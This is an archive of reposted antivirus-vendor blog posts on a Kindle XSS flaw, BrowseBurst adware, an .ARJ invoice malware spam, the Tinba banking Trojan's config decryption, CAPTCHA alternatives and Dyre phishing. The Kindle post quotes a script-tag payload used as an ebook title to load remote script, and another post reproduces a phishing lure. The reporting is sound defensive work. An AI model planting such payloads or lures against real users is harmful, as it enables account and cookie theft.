Category Archives: Antivirus Vendors

Antivirus Vendors

ESET

Free ebooks warning: Pirates ‘can hack into Amazon accounts’

Pirating ebooks is not just bad for the publishing industry: free ebooks available online can also be used to hack into Amazon accounts via the retail giant’s ‘Manage Your Kindle’ page, used to deliver ebook files to Kindle Readers, according to researcher Benjamin Daniel Mussler.

Mussler writes that simply changing the title of the free ebooks allows attackers to execute code when a victim opens the ‘Kindle Library’ page in a web browser, The Digital Reader reports

“As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised,” Mussler writes.

Engadget reports that Mussler discovered the security issue last October, and the company rapidly patched it. It was reintroduced, however, when the company launched a new version of the “Manage Your Kindle” web page.

Free ebooks: a threat?

Mussler writes that the threat affects, “Everyone who uses Amazon’s Kindle Library,” but stresses that the flaw affects those who pirate free ebooks in particular.

The attack takes place, he writes, “Once an attacker manages to have an e-book (file, document, …) with a title like <script src=”https://www.example.org/script.js”></script> added to the victim’s library.”

Mussler says, “Users most likely to fall victim to this vulnerability are those who obtain e-books from untrustworthy sources (read: pirated e-books) and then use Amazon’s “Send to Kindle” service to have them delivered to their Kindle. From the supplier’s point of view, vulnerabilities like this present an opportunity to gain access to active Amazon accounts.”

Kindle users beware

The reappearance of the flaw was highlighted by the German ebook blog Alles Book. The site also produced a proof-of-concept ebook download to demonstrate that it worked. As of the time of writing, the flaw is still active, Mussler reports.

Mussler says, “Amazon chose not to respond to my subsequent email detailing the issue, and two months later, the vulnerability remains unfixed.”

The post Free ebooks warning: Pirates ‘can hack into Amazon accounts’ appeared first on We Live Security.

Avira

Browser Extensions that nobody wants… but a lot of people have!

The marketplace for browser extensions is quite big. With Firefox alone, there have been more than four billion add-ons downloaded. But not every extension makes the user happy:

In the last couple weeks, we monitored rampant spreading of browser extensions with new machinery for harming the user – via the publishing of unwanted advertisements. The list of names of such extensions is long: Browsefox, Swiftbrowse, Betterbrowse, Browsesmart, Browseburst… All share the same two major traits: They user doesn’t want them, and they are hard to remove from the computer.

Of course, we’ve had our attention on this kind of browser extension, with the aim to protect and warn Avira customers about it. We tracked the extensions’ speed of global growth, created specific Avira Intelligent Repair System (AIRS) routines, and adjusted our engine detection to detect these types of unwanted browser extensions.

Finally, with the engine detection pattern “Adware/Browsefox.Gen,” included in Avira version 8.3.24.22, we took the first step forward.

And the first results are incredible:

Since the release of the engine version, we were able to recognize more than 20 million detections in the ‘Avira World’. And regarding the spreading of these extensions: During our initial research, we noticed extreme propagation for the browser extension in Germany. But after the release of the generic detection, we saw that even more regions in the world have these unwanted extensions installed. Now, we can see better their global movement.

extension-worldwide-detections

But what exactly are these browser extensions doing on your computer? Their primary goal is to make money. And, as mentioned, their means of doing such is, after the installation, to publish unwanted advertisements on your computer. For example, it will show coupons with their offers. And this is exactly their means of earning money. With each additional advertisement, the cash flows.

extension-ads

The list of names using this tactic is long. Very long. But if you take a look at some of their “official” websites, you will see that they are all related. They share the same style and options. Only the name of the product changes, along with different photos…

extension-ads-photos

Also interesting is the word ‘official’. We tried to find out the official company or person behind these sites, but there is no official contact information.

extension-blog

How would you get this extension? It would most likely be installed as a third-party software in other setups. For example, if you are looking for a new Internet Browser, search for it in your search engine of choice and pick the first offer – you will get an installer and won´t recognize that this installer was not from an official website. When starting the browser installation process, the extension will also be installed – silently. The behavior of these components is typically the same. They create new folders on your computer in the following directories. Here is one example with the extension ‘BrowseBurst’:

%PROGRAM FILES%BrowseBurst
bin
utilBrowseBurst.exe
BrowseBurst.BrowserAdapter.exe
FilterApp_C64.exe
BrowseBurst.PurBrowse64.exe
BrowseBurst.PurBrowse.exe
BrowseBurst
updater.exe

On the registry, there are some changes made by installing the extension:

HKLMSoftwareBrowseBurst
HKLMSoftwareWow6432NodeBrowseBurst
HKLMSoftwareMicrosoftInternet ExplorerApproved Extensions
Value: %CLSID%
HKLMSoftwareMicrosoftWindowsCurrentVersionexplorerBrowser Helper Objects{%CLSID%}
HKLMSoftwareMicrosoftWindowsCurrentVersionUninstallBrowseBurst
HKLM SYSTEMCurrentControlSetservices%ExtensionName%

The extension may contain options (Browser Helper Object) that the extension will load into the memory all the time. This is why the combination of detection and repair routine by AIRS is so important.

If you like to know more details about the extensions’ behaviors, our virus researchers have created a detailed description:

Adware/Browsefox.Gen: http://www.avira.com/en/support-threats-summary/tid/8495/tlang/en

The post Browser Extensions that nobody wants… but a lot of people have! appeared first on Avira Blog.

ESET

Beware overdue invoice malware attack, wrapped in an .ARJ file!

If you’ve been messing around with technology for a while, you may remember the good old days of acoustic couplers, ZModem, and Bulletin Board Systems (BBSes).

These were the days before the worldwide web had taken off, when even the slowest broadband speeds would have been sheer fantasy.

And because getting an online connection was slow and sometimes flakey, it wasn’t at all uncommon for techies to compress their programs and downloadable files into tight little packages, to make the download as painless as possible for users. The most famous compression tool of all was PKZip, created by the late Phil Katz, and versions of the .ZIP file format are still widely used today in some circles.

But there were other data compression tools which competed for .ZIP’s crown, each with their own loyal bands of followers. And one of the most famous was .ARJ.

And, to be honest, ARJ was pretty cool.

So you can imagine my delight when I discovered today that .ARJ wasn’t entirely forgotten and consigned to the dusty annals of history. Instead, it is still being used – albeit by malware authors…

Here is an example of a typical malicious email, spammed out by online criminals:

Example of overdue invoice malware

<blockquote style=”margin: 15px;padding: 15px 15px 5px;border-left: 5px solid #ccc;font-size: 13px;
font-style: normal;font-family: ‘Helvetica Neue’, Helvetica, sans-serif;line-height: 19px;”>

Subject: Overdue invoice #14588516
Attached file: invc_2014-09-15_7689099765.arj

Morning,

I was hoping to hear from you by now. May I have payment on invoice #45322407834 today please, or would you like a further extension?

Best regards,
Mauro Reddin

Of course, the social engineering might have been a little better thought out. For instance, the invoice numbers quoted in the email don’t match each other.

But it’s easy to imagine how many users might be alarmed to hear that it is being suggested that they are being accused of a late payment, and would click on the attached .ARJ file without thinking of the possible consequences.

At that point the .ARJ file will decompress, spilling out its contents.

As Conrad Longmoore explains on the Dynamoo blog, inside the .ARJ archive file is an executable program – designed to infect your Windows computer.

Before you know it, your Windows PC could have been hijacked by a hacker and recruited into a botnet. Whereupon the remote attacker could command it to send spam on their behalf, launch denial-of-service attacks or steal your personal information.

That’s why you should always be wary of opening unsolicited files sent to you out of the blue via email.

The good news for users of ESET anti-virus products is that it is detected as a variant of Win32/Injector.BLWX. But if you are using a different vendor’s security product you may wish to double-check that it has been updated to protect against the threat.

The post Beware overdue invoice malware attack, wrapped in an .ARJ file! appeared first on We Live Security.

Avast

Tiny Banker Trojan targets customers of major banks worldwide

The Tinba Trojan aka Tiny Banker targeted Czech bank customers this summer; now it’s gone global.

After an analysis of a payload distributed by Rig Exploit kit, the AVAST Virus Lab identified a payload as Tinba Banker. This Trojan targets a large scope of banks like Bank of America, ING Direct, and HSBC.

 hsbc_bank

In comparison with our previous blogpost, Tinybanker Trojan targets banking customers, this variant has some differences,  which we will describe later.

How does Tiny Banker work?

  1. 1. The user visits an website infected with the Rig Exploit kit (Flash or Silverlight exploit).
  2. 2. If the system is vulnerable, then the exploit executes a malicious code which downloads and executes the malware payload, Tinba Trojan.
  3. 3. When the computer is infected and the user tries to log into one of the targeted banks, webinjects come into effect and the victim is asked to fill out a  form with his personal data.
  4. 4. If he confirms the form, the data are sent to the attackers. This includes credit card information, address, social security number, etc. An interesting field is “Mother’s Maiden Name” which is often used as a security question to reset a password.

The example of an injected form targeting Wells Fargo bank customers is displayed in the image below.

form

Differences from the Czech campaign

In the case of the Tinba “Tiny Banker” targeting Czech users, the payload was simply encrypted with a hardcoded RC4 password. However, in this case, a few more steps had to be done. At first, we located the folder with the installed banking Trojan. This folder contained an executable file and the configuration file – see the next figure for the encrypted configuration file.

tinba_enc0

 

At first, XOR operation with a hardcoded value 0xac68d9b2 was applied.

tinba_enc1

 

Then, RC4 decryption with harcoded password was performed. After RC4 decryption, we noticed AP32 marker at the beginning of the decrypted payload, which signalized aplib compression.

tinba_enc2

 

Therefore, after aplib decompression, we got the configuration file in plaintext. After studying this roughly 65KB long plaintext file, we noticed that it targets financial institutions worldwide.

tinba_enc3

Targeted financial institutions

 Screenshots of targeted banks

us_bank

td_bank

 

Conclusion

Keep your software up-to-date. Software updates are necessary to patch vulnerabilities. Unpatched vulnerabilities open you to serious risk which may lead to money loss. For more protection, use security software such as avast! Antivirus with Software Updater feature. Software Updater informs you about  updates available for your computer.

SHA’s and detections

Exploits

CC0A4889C9D5FFE3A396D021329BD88D11D5159C3B42988EADC1309C9059778D
1266294F6887C61C9D47463C2FE524EB1B0DA1AF5C1970DF62424DA6B88D9E2A

Payload

856E486F338CBD8DAED51932698F9CDC9C60F4558D22D963F56DA7240490E465
88F26102DB1D8024BA85F8438AC23CE74CEAE609F4BA3F49012B66BDBBE34A7B

avast! detections: MSIL:Agent-CBZ [Expl], SWF:Nesty-A [Expl], Win32:Banker-LAU [Trj]

Acknowledgement

This analysis was done collaboratively by David Fiser and Jaromir Horejsi.

Thank you for using avast! Antivirus and recommending us to your friends and family. For all the latest news, fun and contest information, please follow us on Facebook, Twitter and Google+. Business owners – check out our business products.

 

Panda Security

Fed up with CAPTCHA? How to avoid it?

avoid captcha

It is always annoying. You enter a website and suddenly, a CAPTCHA assaults you in doubt over whether you are human or a robot with, generally, malicious intentions. Some crossed out or distorted characters that you must decipher so that the system is sure that you do not have the slightest intention of exploiting the website’s resources beyond your possibilities. However, it is extremely tiresome because it is not easy to make out the combination of letters and numbers they show you in order to prove that you are not an intruder.

At last, after many years someone has set out to implement new methods that are not so much hassle. However, we will not be able to get away with not proving that we are made of flesh and bone and do not have any bad intentions but they thought that it would be better to do it in a more fun and entertaining way than wasting time trying to decipher completely illegible letters and numbers.

With this goal in mind, a group of researchers at the University of Alabama at Birmingham got down to work. Tired of the pesky CAPTCHAs, they decided to create a new method so that the websites that considered it necessary could check whether a human or robot was on the other side of the screen. Their plans also included finding a system that was more entertaining for users who have good intentions and setting up more barriers for those who program a bot to act like a human.

Captcha

This is how what they called ‘dynamic cognitive game’ or DCG came about. The team, consisting of Manar Mohamed, Song Gao, Chengcui Zhang and led by Nitesh Saxena, have published a new way of checking whether someone is trying to enter a website to abuse the services it offers.

The new system challenges the user with a simple and good-natured game. A puzzle that, unlike CAPTCHA, will not try your patience getting it wrong time after time for not being able to clearly see the letters and numbers shown on screen. Now all you will have to do is select the object that is not a boat, for example. Or even easier, a straight-forward drag and drop task that involves dragging geometric figures to the space with the same shape.

As you can see, they are extremely easy actions for any Internet user but impede the action of bots programed to complete many CAPTCHA in the blink of any eye. Because while humans will just have to identify the object and drag it and can solve it first go, the programs used by spammers will need several attempts. So by trying so many times and getting it wrong, the mechanism will detect strange behavior and classify it as an intruder.

What’s more, this new method created by researchers at the University of Alabama at Birmingham, is also proposed as an alternative for dissuading those with malicious intentions who have moved from programs to new ways of exploiting website resources.

As crazy as it may seem, through extortion or money –usually a very small amount- there are people who work non-stop for someone who needs them to complete the forms on websites. These cognitive games will make it more difficult for them because this system is not as mechanical as the one used by the tiresome CAPTCHAs.

It’s not the first and it won’t be the last alternative

There have been many who, fed up with tedious verification processes of entering letters and numbers, have suggested alternatives to the system devised by Guatmalan Luis Von Ahn in 2000. A math puzzle, a task puzzle or even solving an audio message in which someone says something in a distorted voice.

However, it is going to be very difficult to completely do away with CAPTCHA. Not because the new systems are more or less reliable but because thanks to these and without having the slightest idea, we are working for Google. Without a contract or payment of any kind, whenever we complete a CAPTCHA or reCAPTCHA to prove that we are a human who wants to open a Gmail account, we are contributing to this company’s goal of digitalizing all of the books in the world. Did you know that?

The post Fed up with CAPTCHA? How to avoid it? appeared first on MediaCenter Panda Security.

ESET

Phishing email: UK hit with three times as many ‘bad’ links as U.S.

British internet users opening a spam email are three times more likely to be facing a malicious URL than users in the US, according to new research by phishing email specialists Proofpoint. German and French internet users were hit by fewer still, with just a fifth of the levels British internet users endure.

British users appear to be being targeted with high levels of financial malware, such as the banking Trojan Dyre.

Oddly, this finding does not correlate to a high level of spam email targeting the country. Germans receive the highest percentage of spam email overall, according to Tech World.

The findings come from an analysis of seven billion URLs monitored every week over a three week period this summer.

Phishing email: smells fishy?

Tech World comments, “This raises the possibility that the higher phishing email levels aimed at the UK are a random fluctuation and a result of when the time period chosen than a fundamental trend.”

Proofpoint responded via email that the high level of targeted financial phishing email suggested that Britain was being targeted with malware simply because it brought lucrative returns.

“The attacks are clearly financially motivated. We’ve historically seen higher volumes of attacks targeted at regions that generate more success for the attackers because that’s where the money is,” said Proofpoint VP of security, Kevin Epstein.

“Relative to other countries in this report, this is a startlingly high number of targeted attacks against the UK. Given the financial motivations of the attacks, this strongly suggests cybercriminals have found UK organizations to be an unusually lucrative target.”

Dyre warning for British users

Infosecurity Magazine points out that among the malicious payloads delivered to British users was a high number of emails containing the Dyre banking Trojan, which was in the headlines again last week, after the malware was used to target users of the popular Customer Relationship Management software Salesforce.

Named Dyre, or Dyreza (and detected by ESET software as Win32/Battdil.A), the Trojan software was discovered by researchers investigating a phishing scam that was spreading via Dropbox. It is believed to be a completely new family of malware, similar to but sufficiently distinct from, the Zeus malware.

Dyre has been designed to target certain banks in particular – Bank of America, CitiGroup, but also a large number of British banks, in particular NatWest, RBS and Ulsterbank.

It is thought to be an example of ‘crime-as-a-service’ – malware for hire to the highest bidder. It has been found able to bypass both SSL encryption and two-factor authentication systems.

Speaking to Infosecurity, Proofpoint suggested that the malware had, “become increasingly popular in the wake of the Gameover Zeus takedown.”

 

The post Phishing email: UK hit with three times as many ‘bad’ links as U.S. appeared first on We Live Security.